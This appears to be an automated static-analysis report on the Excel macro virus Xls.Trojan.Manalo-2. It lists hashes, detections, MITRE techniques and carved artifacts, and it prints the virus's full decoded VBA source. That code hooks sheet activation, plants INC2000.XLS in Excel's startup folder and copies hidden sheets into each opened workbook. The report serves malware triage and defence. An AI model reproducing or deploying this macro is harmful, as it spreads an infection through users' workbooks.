Xls.Trojan.Manalo-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 678ab84953b65f91…

MALICIOUS

Office (OLE)

784.5 KB Created: 2000-03-20 16:27:22 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: a626c3dc6e692d9d9cc5b1967a529445 SHA-1: a9baee75fbf40319ac7b3204c977825402d389c4 SHA-256: 678ab84953b65f91c976d2c00fe70cefb8e2885b37e37d7a9e561cd505108250
242 Risk Score

Malware Insights

Xls.Trojan.Manalo-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5 macro virus (Xls.Trojan.Manalo-2) by ClamAV. The Auto_Open VBA macro attempts to infect other Excel workbooks by copying its sheets into them and saving a new file named 'INC2000.XLS' in the application's startup path. This indicates a macro-based infection and propagation mechanism.

Heuristics 5

  • ClamAV: Xls.Trojan.Manalo-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Manalo-2
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9134 bytes
SHA-256: f59604cc6f418c0af6f440d3ceaff087c494e302d473cec88bfc575d8da9ea00
Detection
ClamAV: Xls.Trojan.Manalo-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DNA"




Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
        Application.OnSheetActivate = "User"

End Sub

Sub User()
Attribute User.VB_ProcData.VB_Invoke_Func = " \n14"
        
On Error GoTo Finish

date_today = Format(Now, "yyyymmdd")
        
Startup$ = Application.StartupPath
File$ = Dir(Startup$ & "\" & "INC2000.XLS")

If File$ <> "INC2000.XLS" Then GoTo FileDoesNotExist Else GoTo InfectOpenFile

FileDoesNotExist:
            
   Infected$ = ActiveWorkbook.Name
   
   Application.ScreenUpdating = False

   Set newBook = Workbooks.Add
    With newBook
        .Title = ""
        .Subject = ""
    End With
   
   NewWorkbook$ = ActiveWorkbook.Name
   Sheet$ = Workbooks(NewWorkbook$).Sheets(1).Name
        
   If Sheet$ <> "DNA" _
      Then
        Workbooks(Infected$).Sheets("FYM").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
        Workbooks(Infected$).Sheets("DNA").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
        Workbooks(NewWorkbook$).Sheets("DNA").Visible = False
        Workbooks(NewWorkbook$).Sheets("FYM").Visible = False
      Else
   End If

   ActiveWindow.Visible = False
      
   Workbooks(NewWorkbook$).SaveAs FileName:=Application.StartupPath & "/" & "INC2000.XLS"

GoTo Finish

InfectOpenFile:
        
   FileName$ = ActiveWorkbook.Name
   FirstSheet$ = Workbooks(FileName$).Sheets(1).Name
        
   Application.ScreenUpdating = False
   
   If FirstSheet$ <> "DNA" _
      Then
        Workbooks("INC2000.XLS").Sheets("DNA").Copy Before:=Workbooks(FileName$).Sheets(1)
        Workbooks("INC2000.XLS").Sheets("FYM").Copy After:=Workbooks(FileName$).Sheets("DNA")
        
'If (date_today >= "20000510") Then Workbooks(filename$).Sheets("FYM").Name = "FYManalo"
'If (date_today >= "20000510") Then Workbooks("INC2000.XLS").Sheets("FYM").Copy Before:=Workbooks(filename$).Sheets("FYManalo")
        
        
        Workbooks(FileName$).Sheets("DNA").Visible = False
        Workbooks(FileName$).Sheets("FYM").Visible = False
        
'If (date_today >= "20000510") Then Workbooks(filename$).Sheets("FYManalo").Visible = True
        
Else
If (date_today >= "20000510") Then Workbooks(FileName$).Sheets("FYM").Name = "FYManalo"
If (date_today >= "20000510") Then Workbooks("INC2000.XLS").Sheets("FYM").Copy Before:=Workbooks(FileName$).Sheets("FYManalo")
If (date_today >= "20000510") Then Workbooks(FileName$).Sheets("FYManalo").Visible = True
If (date_today >= "20000510") Then Workbooks(FileName$).Sheets("FYM").Visible = False

End If

Finish:
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "INC2000.XLS!User"

End Sub


' Processing file: /opt/analyzer/scan_staging/4db755bbf8634d5f913f6b8ecb391d90.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DNA - 6121 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' 	FuncDefn (Sub Auto_Open())
' Line #5:
' 	LitStr 0x0004 "User"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #6:
' Line #7:
' 	EndSub 
' Line #8:
' Line #9:
' 	FuncDefn (Sub User())
' Line #10:
' Line #11:
' 	OnError Finish 
' Line #12:
' Line #13:
' 	Ld Now 
' 	LitStr 0x0008 "yyyymmdd"
' 	ArgsLd Format$ 0x0002 
' 	St date_today 
' Line #14:
' Line #15:
' 	Ld Application 
' 	MemLd StartupPath 
' 	St Startup$ 
' Line #16:
' 	Ld Startup$ 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x000B "INC2000.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St File$ 
' Line #17:
' Line #18:
' 	Ld File$ 
' 	LitStr 0x000B "INC2000.XLS"
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	GoTo FileDoesNotExist 
' 	Else 
' 	BoSImplicit 
' 	GoTo InfectOpenFile 
' 	EndIf 
' Line #19:
' Line #20:
' 	Label FileDoesNotExist 
' Line #21:
' Line #22:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St Infected$ 
' Line #23:
' Line #24:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #25:
' Line #26:
' 	SetStmt 
' 	Ld Workbooks 
' 	MemLd Add 
' 	Set newBook 
' Line #2
... (truncated)
ole10native_00.bin ole-package OLE Ole10Native stream: MBD0006DB86/Ole10Native 38180 bytes
SHA-256: 764d7393b19744a570246d85899ec3f9049322d7d83c9f6cf618c1008f179e74
ole10native_01.bin ole-package OLE Ole10Native stream: MBD0006DB8F/Ole10Native 36676 bytes
SHA-256: a7e601393bc6d38a6aceb5658cdd76874414a505a9136399746a9476d647a2e6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.56, consistent with packed or encrypted content.
ole10native_02.bin ole-package OLE Ole10Native stream: MBD0006DB95/Ole10Native 36228 bytes
SHA-256: 64021180958a1022c43e777ca7bbe5cd3e7847e7f48daccae1f74c75c0582f6f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.49, consistent with packed or encrypted content.
ole10native_03.bin ole-package OLE Ole10Native stream: MBD0006DB9A/Ole10Native 105220 bytes
SHA-256: 0564ccfcc8b704bb8f893dedd52ef3a82130caad9c64008c5229b321dbacf00a